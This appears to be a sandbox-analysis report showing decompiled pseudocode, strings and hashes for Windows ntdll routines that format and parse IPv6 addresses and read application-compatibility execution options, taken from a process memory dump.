				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00AA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa72926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00AA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa79cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00AA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00AA7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00AA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00AA7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                        0x00ab13d5
                                                                                        0x00ab13d9
                                                                                        0x00ab13dc
                                                                                        0x00ab13de
                                                                                        0x00ab13e1
                                                                                        0x00ab13e8
                                                                                        0x00ab13ee
                                                                                        0x00ade8fd
                                                                                        0x00000000
                                                                                        0x00ade921
                                                                                        0x00ade921
                                                                                        0x00ade928
                                                                                        0x00ade982
                                                                                        0x00ade98a
                                                                                        0x00000000
                                                                                        0x00ade99a
                                                                                        0x00ade99e
                                                                                        0x00ade9a3
                                                                                        0x00ade9a8
                                                                                        0x00ade9b9
                                                                                        0x00ade978
                                                                                        0x00000000
                                                                                        0x00ade978
                                                                                        0x00ade98a
                                                                                        0x00ade92a
                                                                                        0x00ade931
                                                                                        0x00ade944
                                                                                        0x00ade944
                                                                                        0x00ade950
                                                                                        0x00ade954
                                                                                        0x00ade959
                                                                                        0x00ade95e
                                                                                        0x00ade963
                                                                                        0x00ade970
                                                                                        0x00000000
                                                                                        0x00ade975
                                                                                        0x00ade93b
                                                                                        0x00ade980
                                                                                        0x00000000
                                                                                        0x00ade980
                                                                                        0x00ade942
                                                                                        0x00ade94b
                                                                                        0x00000000
                                                                                        0x00ade94b
                                                                                        0x00000000
                                                                                        0x00ade942
                                                                                        0x00ab13f4
                                                                                        0x00ab13f4
                                                                                        0x00ab13f9
                                                                                        0x00ab13fc
                                                                                        0x00ab13ff
                                                                                        0x00ab1406
                                                                                        0x00ade9cc
                                                                                        0x00ade9d2
                                                                                        0x00ade9d2
                                                                                        0x00ade9cc
                                                                                        0x00ab140c
                                                                                        0x00ab1411
                                                                                        0x00ab1431
                                                                                        0x00ab143a
                                                                                        0x00ab143c
                                                                                        0x00ab143f
                                                                                        0x00ab143f
                                                                                        0x00ab1442
                                                                                        0x00ab1447
                                                                                        0x00ab14a8
                                                                                        0x00ab14ac
                                                                                        0x00ade9e2
                                                                                        0x00ade9e7
                                                                                        0x00ade9ec
                                                                                        0x00adea05
                                                                                        0x00adea05
                                                                                        0x00000000
                                                                                        0x00ab1449
                                                                                        0x00000000
                                                                                        0x00ab1449
                                                                                        0x00ab144c
                                                                                        0x00ab1459
                                                                                        0x00ab1462
                                                                                        0x00ab1469
                                                                                        0x00ab146a
                                                                                        0x00ab1470
                                                                                        0x00ab1473
                                                                                        0x00ab1476
                                                                                        0x00ab1476
                                                                                        0x00ab1490
                                                                                        0x00ab1495
                                                                                        0x00ab138e
                                                                                        0x00ab1390
                                                                                        0x00ab1397
                                                                                        0x00ab1398
                                                                                        0x00ab1399
                                                                                        0x00ab13a1
                                                                                        0x00ab13a4
                                                                                        0x00ab13a4
                                                                                        0x00ab1498
                                                                                        0x00ab149c
                                                                                        0x00ab149f
                                                                                        0x00ab14a2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab14a4
                                                                                        0x00000000
                                                                                        0x00ab14a4
                                                                                        0x00ab1413
                                                                                        0x00ab1415
                                                                                        0x00ab1416
                                                                                        0x00ab1419
                                                                                        0x00ab141c
                                                                                        0x00ab1422
                                                                                        0x00ab13b7
                                                                                        0x00ab13bc
                                                                                        0x00ab13bf
                                                                                        0x00ab13bf
                                                                                        0x00ab13c2
                                                                                        0x00ab1424
                                                                                        0x00ab1424
                                                                                        0x00ab1424
                                                                                        0x00ab1427
                                                                                        0x00ab142b
                                                                                        0x00ab142c
                                                                                        0x00ab142c
                                                                                        0x00ab142c
                                                                                        0x00000000
                                                                                        0x00ab141c
                                                                                        0x00ab1411

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                                                        • Instruction ID: 73cc18af1fa9017f7925262be259ede0acc4c2233492ba7f3f330d7c579eb102
                                                                                        • Opcode Fuzzy Hash: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                                                        • Instruction Fuzzy Hash: 4F613BB1900655AACB34DF59C8A08FFBBF9EF94300754C42EF4DA4B642E3349A40DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E00AA7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb52088; // 0x77499e17
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00AA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00AC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A7DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb54218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00AC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A80D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00AC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A88375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00AC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00AEE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00AC3F92();
					_t38 = 1;
					L2:
					return E00A7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                        0x00aa7f08
                                                                                        0x00aa7f0f
                                                                                        0x00aa7f12
                                                                                        0x00aa7f1b
                                                                                        0x00aa7f31
                                                                                        0x00ac3ead
                                                                                        0x00ac3eb4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac3eba
                                                                                        0x00ac3ecd
                                                                                        0x00ac3ed2
                                                                                        0x00ac3ee1
                                                                                        0x00ac3ee7
                                                                                        0x00ac3eec
                                                                                        0x00ac3f12
                                                                                        0x00ac3f18
                                                                                        0x00ac3f1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac3f20
                                                                                        0x00ac3f26
                                                                                        0x00ac3f28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac3f2e
                                                                                        0x00ac3f30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac3f3a
                                                                                        0x00ac3f3b
                                                                                        0x00ac3f53
                                                                                        0x00ac3f64
                                                                                        0x00ac3f69
                                                                                        0x00ac3f6c
                                                                                        0x00ac3f6d
                                                                                        0x00ac3f6f
                                                                                        0x00ace304
                                                                                        0x00ace30f
                                                                                        0x00ace315
                                                                                        0x00ace31e
                                                                                        0x00ace321
                                                                                        0x00ace327
                                                                                        0x00ace329
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ace32f
                                                                                        0x00ace32f
                                                                                        0x00ace337
                                                                                        0x00ace33a
                                                                                        0x00ace33b
                                                                                        0x00ace33d
                                                                                        0x00ace33f
                                                                                        0x00ace341
                                                                                        0x00ace341
                                                                                        0x00ace34e
                                                                                        0x00ace353
                                                                                        0x00ace358
                                                                                        0x00ace35d
                                                                                        0x00ace35f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ace365
                                                                                        0x00ace365
                                                                                        0x00ace368
                                                                                        0x00ace36e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ace374
                                                                                        0x00ace32f
                                                                                        0x00ac3f75
                                                                                        0x00ac3f7a
                                                                                        0x00ac3f7c
                                                                                        0x00ac3f7e
                                                                                        0x00ac3f86
                                                                                        0x00aa7f39
                                                                                        0x00aa7f47
                                                                                        0x00aa7f47
                                                                                        0x00aa7f37
                                                                                        0x00aa7f37
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AC3F12
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AC3EC4
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00ACE2FB
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00ACE345
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AC3F4A
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AC3F75
                                                                                        • ExecuteOptions, xrefs: 00AC3F04
                                                                                        • Execute=1, xrefs: 00AC3F5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: BaseDataModuleQuery
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 3901378454-484625025
                                                                                        • Opcode ID: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                                                        • Instruction ID: a8651ef1699448fbfff9239e1310a2b11b3e1fff0a88065a6d8e25aa8ed3b3ee
                                                                                        • Opcode Fuzzy Hash: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                                                        • Instruction Fuzzy Hash: A9419572A4031C7ADF20DB94DD86FDF73BCAB15700F0085A9B509A71C1EB70AB458BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AB0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00AB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00AB0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00AB0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00AB06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00AB06BA(_t135, _t178) == 0 || E00AB0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00AB0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00AB0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00AB06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00AB06BA(_t124, _t142) == 0 || E00AB0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                        0x00ab0b21
                                                                                        0x00ab0b24
                                                                                        0x00ab0b27
                                                                                        0x00ab0b2a
                                                                                        0x00ab0b2d
                                                                                        0x00ab0b30
                                                                                        0x00ab0b33
                                                                                        0x00ab0b36
                                                                                        0x00ab0b39
                                                                                        0x00ab0b3e
                                                                                        0x00ab0c65
                                                                                        0x00ab0c68
                                                                                        0x00ab0c6a
                                                                                        0x00ab0c6f
                                                                                        0x00adeb42
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb48
                                                                                        0x00adeb48
                                                                                        0x00ab0c75
                                                                                        0x00ab0c7a
                                                                                        0x00adeb54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb5a
                                                                                        0x00ab0c80
                                                                                        0x00ab0c84
                                                                                        0x00adeb98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeba6
                                                                                        0x00ab0cb8
                                                                                        0x00ab0cba
                                                                                        0x00ab0cd3
                                                                                        0x00ab0cda
                                                                                        0x00ab0ce4
                                                                                        0x00ab0ce9
                                                                                        0x00000000
                                                                                        0x00ab0cec
                                                                                        0x00ab0c8c
                                                                                        0x00adeb63
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb70
                                                                                        0x00adeb75
                                                                                        0x00adeb7d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb8c
                                                                                        0x00000000
                                                                                        0x00adeb8c
                                                                                        0x00ab0c96
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0ca2
                                                                                        0x00ab0cac
                                                                                        0x00ab0cb4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b44
                                                                                        0x00ab0b47
                                                                                        0x00ab0b49
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b4f
                                                                                        0x00ab0b50
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b56
                                                                                        0x00ab0b62
                                                                                        0x00ab0b7c
                                                                                        0x00ab0bac
                                                                                        0x00ab0a0f
                                                                                        0x00adeaaa
                                                                                        0x00000000
                                                                                        0x00adeac4
                                                                                        0x00adeac4
                                                                                        0x00ab0bd0
                                                                                        0x00ab0bd0
                                                                                        0x00ab0bd4
                                                                                        0x00ab0bd9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0bdb
                                                                                        0x00ab0be0
                                                                                        0x00adeb0e
                                                                                        0x00ab0a1a
                                                                                        0x00000000
                                                                                        0x00ab0a1a
                                                                                        0x00adeb1a
                                                                                        0x00adeb1f
                                                                                        0x00adeb27
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb36
                                                                                        0x00000000
                                                                                        0x00adeb36
                                                                                        0x00ab0bea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0bf6
                                                                                        0x00ab0c00
                                                                                        0x00ab0c03
                                                                                        0x00ab0c0b
                                                                                        0x00000000
                                                                                        0x00ab0c0b
                                                                                        0x00adeaaa
                                                                                        0x00000000
                                                                                        0x00ab0a15
                                                                                        0x00ab0bb6
                                                                                        0x00000000
                                                                                        0x00ab0bc6
                                                                                        0x00ab0bc6
                                                                                        0x00ab0bcb
                                                                                        0x00ab0c15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0c1d
                                                                                        0x00ab0c20
                                                                                        0x00ab0c21
                                                                                        0x00ab0c24
                                                                                        0x00ab0c24
                                                                                        0x00ab0c26
                                                                                        0x00000000
                                                                                        0x00ab0c26
                                                                                        0x00ab0bcd
                                                                                        0x00000000
                                                                                        0x00ab0bcd
                                                                                        0x00ab0b89
                                                                                        0x00ab0b89
                                                                                        0x00ab0b90
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b96
                                                                                        0x00000000
                                                                                        0x00ab0b96
                                                                                        0x00ab0a04
                                                                                        0x00ab0a04
                                                                                        0x00ab0b9a
                                                                                        0x00ab0b9a
                                                                                        0x00ab0b9b
                                                                                        0x00ab0b9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0ba5
                                                                                        0x00ab0ac7
                                                                                        0x00ab0aca
                                                                                        0x00adeacf
                                                                                        0x00000000
                                                                                        0x00adeade
                                                                                        0x00adeade
                                                                                        0x00adeae3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeaf3
                                                                                        0x00adeaf6
                                                                                        0x00adeaf7
                                                                                        0x00adeafe
                                                                                        0x00adeb01
                                                                                        0x00000000
                                                                                        0x00adeb01
                                                                                        0x00adeacf
                                                                                        0x00ab0ad0
                                                                                        0x00ab0ad4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0ada
                                                                                        0x00ab0ae6
                                                                                        0x00ab0c34
                                                                                        0x00000000
                                                                                        0x00ab0c47
                                                                                        0x00ab0c49
                                                                                        0x00ab0c4a
                                                                                        0x00ab0c4e
                                                                                        0x00ab0c51
                                                                                        0x00ab0c54
                                                                                        0x00ab0c57
                                                                                        0x00ab0c5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0c60
                                                                                        0x00ab0afb
                                                                                        0x00ab0afe
                                                                                        0x00ab0b02
                                                                                        0x00ab0b05
                                                                                        0x00ab0b08
                                                                                        0x00000000
                                                                                        0x00ab0b08
                                                                                        0x00ab0ae6
                                                                                        0x00ab0b44
                                                                                        0x00ab09f8
                                                                                        0x00ab09f8
                                                                                        0x00ab09f9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeaa0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID: .$:$:
                                                                                        • API String ID: 3965848254-2308638275
                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction ID: c8c82aeadabb0ebd0fed61d8f7a7588cdaaf12bc93c51caf5d738e2111e35faa
                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction Fuzzy Hash: 09A17C7190030AEFCB24DF64C855AFFBBBCAF16305F2485AAD852A7283D7349A41DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AB0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 49%
